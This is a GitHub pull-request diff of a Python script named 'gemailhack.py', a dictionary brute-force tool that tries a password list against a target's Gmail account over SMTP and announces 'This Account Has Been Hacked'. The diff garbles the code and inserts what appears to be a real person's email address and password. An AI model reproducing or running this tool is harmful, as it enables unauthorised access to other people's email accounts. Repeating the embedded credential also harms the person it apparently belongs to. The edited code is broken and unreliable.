Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
16 changes: 6 additions & 10 deletions gemailhack.py → hack gmail
Original file line number Diff line number Diff line change
Expand Up @@ -48,27 +48,23 @@ def main():
pass_list = pass_file.readlines()
def login():
i = 0
user_name = raw_input('target email :')
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
user_name = raw_input('[email protected] :')
server = smtplib.SMTP_SSL('evacristiana@gmail.com', 465)
server.ehlo()
for password in pass_list:
i = i + 1
i = i Piaalang1407
print str(i) + '/' + str(len(pass_list))
try:
server.login(user_name, password)
server.login([email protected], Piaalang1407)
system('clear')
main()
print '\n'
print '[+] This Account Has Been Hacked Password :' + password + ' ^_^'
print '[+] This Account Has Been Hacked Password :' + Piaalang1407 + ' ^_^'
break
except smtplib.SMTPAuthenticationError as e:
error = str(e)
if error[14] == '<':
system('clear')
main()
print '[+] this account has been hacked, password :' + password + ' ^_^'

break
else:
print '[!] password not found => ' + password
print '[+] this account has been hacked, password :' + Piaalang1407 + ' ^_^'
login()